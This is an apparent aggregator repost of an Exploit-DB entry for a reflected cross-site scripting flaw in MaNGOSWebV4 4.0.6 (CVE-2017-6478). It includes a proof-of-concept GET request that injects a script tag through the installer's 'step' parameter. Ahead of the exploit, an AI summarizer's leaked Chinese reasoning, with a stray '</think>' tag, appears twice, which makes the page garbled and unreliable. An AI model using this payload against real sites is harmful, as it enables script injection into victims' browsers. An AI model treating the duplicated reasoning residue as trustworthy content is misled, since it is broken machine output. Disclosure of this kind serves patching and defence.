[webapps] MaNGOSWebV4 4.0.6 - Reflected XSS
嗯,用户让我用中文总结一篇文章的内容,控制在一百个字以内,而且不需要用“文章内容总结”或者“这篇文章”这样的开头。直接写描述就行。好的,首先我需要仔细阅读用户提供的文章内容。 文章看起来是一个漏洞报告,标题是MaNGOSWebV4 4.0.6的反射型XSS漏洞。日期是2024年10月26日,作者是CodeSecLab。厂商主页和软件链接都是GitHub上的同一个仓库。版本是4.0.6,测试环境是Ubuntu和Windows,CVE编号是CVE-2017-6478。 然后看PoC部分,提供了一个GET请求的示例,访问安装页面并触发XSSayload。URL参数step被注入了<script>alert(1)</script>这样的代码。 好的,现在我要把这些信息浓缩到100字以内。首先确定关键点:软件名称、漏洞类型、影响版本、触发方式、CVE编号。 可能的结构:MaNGOSWebV4 4.0.6存在反射型XSS漏洞,通过在install/index.php的step参数中注入恶意脚本触发,影响Ubuntu和Windows环境,CVE-2017-6478。 检查字数是否合适。确保信息准确且简洁。 </think> MaNGOSWebV4 4.0.6 存在反射型 XSS 漏洞,攻击者可通过在 `install/index.php` 的 `step` 参数中注入恶意脚本触发攻击,影响 Ubuntu 和 Windows 环境。 2025-12-3 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:1 收藏
嗯,用户让我用中文总结一篇文章的内容,控制在一百个字以内,而且不需要用“文章内容总结”或者“这篇文章”这样的开头。直接写描述就行。好的,首先我需要仔细阅读用户提供的文章内容。 文章看起来是一个漏洞报告,标题是MaNGOSWebV4 4.0.6的反射型XSS漏洞。日期是2024年10月26日,作者是CodeSecLab。厂商主页和软件链接都是GitHub上的同一个仓库。版本是4.0.6,测试环境是Ubuntu和Windows,CVE编号是CVE-2017-6478。 然后看PoC部分,提供了一个GET请求的示例,访问安装页面并触发XSSayload。URL参数step被注入了<script>alert(1)</script>这样的代码。 好的,现在我要把这些信息浓缩到100字以内。首先确定关键点:软件名称、漏洞类型、影响版本、触发方式、CVE编号。 可能的结构:MaNGOSWebV4 4.0.6存在反射型XSS漏洞,通过在install/index.php的step参数中注入恶意脚本触发,影响Ubuntu和Windows环境,CVE-2017-6478。 检查字数是否合适。确保信息准确且简洁。 </think> MaNGOSWebV4 4.0.6 存在反射型 XSS 漏洞,攻击者可通过在 `install/index.php` 的 `step` 参数中注入恶意脚本触发攻击,影响 Ubuntu 和 Windows 环境。 2025-12-3 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:1 收藏
# Exploit Title: MaNGOSWebV4 4.0.6 - Reflected XSS
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/paintballrefjosh/MaNGOSWebV4
# Software Link: https://github.com/paintballrefjosh/MaNGOSWebV4
# Version: 4.0.6
# Tested on: Ubuntu Windows
# CVE : CVE-2017-6478
PoC:
// Access the vulnerable URL and trigger the XSS payload
GET http://mangoswebv4/install/index.php?step=%3Cscript%3Ealert(1)%3C/script%3E
[Replace Your Domain Name]
文章来源: https://www.exploit-db.com/exploits/52457
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh